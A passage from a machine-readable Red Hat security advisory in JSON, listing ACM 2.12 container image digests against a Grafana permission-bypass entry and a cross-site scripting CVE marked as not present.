"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "grafana/grafana/pkg/services/dashboards: Grafana Dashboard Permissions Scope Bypass Enables Cross\u2011Dashboard Privilege Escalation"
},
{
"cve": "CVE-2026-22029",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-01-10T04:01:03.694749+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
